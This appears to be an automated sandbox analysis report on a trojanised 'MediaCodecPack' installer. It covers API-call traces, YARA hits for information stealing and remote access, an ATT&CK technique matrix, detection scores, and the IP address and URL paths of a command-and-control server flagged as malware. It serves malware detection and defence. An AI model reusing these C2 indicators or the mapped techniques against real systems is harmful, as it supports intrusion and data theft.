                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D05E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02D05E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D0E85F cpuid 3_2_02D0E85F
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 7404, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 7404, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets141
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    newwork.exe.1.exe16%ReversingLabsWin32.Trojan.Munp
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\MediaCodecPack\MediaCodecPack.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe100%Joe Sandbox ML
                    C:\ProgramData\MediaCodecPack\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4100%Avira URL Cloudmalware
                    https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D82670%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325100%Avira URL Cloudmalware
                    https://188.119.66.185/ai/?key=8100%Avira URL Cloudmalware
                    https://188.119.66.185/S0%Avira URL Cloudsafe
                    https://188.119.66.185/en-US0%Avira URL Cloudsafe
                    https://188.119.66.185/ography0%Avira URL Cloudsafe
                    https://188.119.66.185/e0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055100%Avira URL Cloudmalware
                    http://wonderwork.ucoz.com/0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484100%Avira URL Cloudmalware
                    https://188.119.66.185/PTKa0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055false
                      • Avira URL Cloud: malware
                      unknown
                      https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484false
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drfalse
                        high
                        https://188.119.66.185/Smediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4mediacodecpack.exe, 00000003.00000002.2572840058.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.remobjects.com/psUnewwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drfalse
                          high
                          https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AC1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://188.119.66.185/ographymediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://188.119.66.185/en-USmediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUnewwork.exe.1.exefalse
                            high
                            https://188.119.66.185/ai/?key=8mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://188.119.66.185/mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://188.119.66.185/en-GBmediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinenewwork.exe.1.exefalse
                                  high
                                  https://188.119.66.185/emediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://wonderwork.ucoz.com/newwork.exe.1.tmp, 00000001.00000002.2575850575.0000000005ADC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1337100436.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, mediacodecpack.exe.1.dr, is-D6CVE.tmp.1.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.remobjects.com/psnewwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.drfalse
                                    high
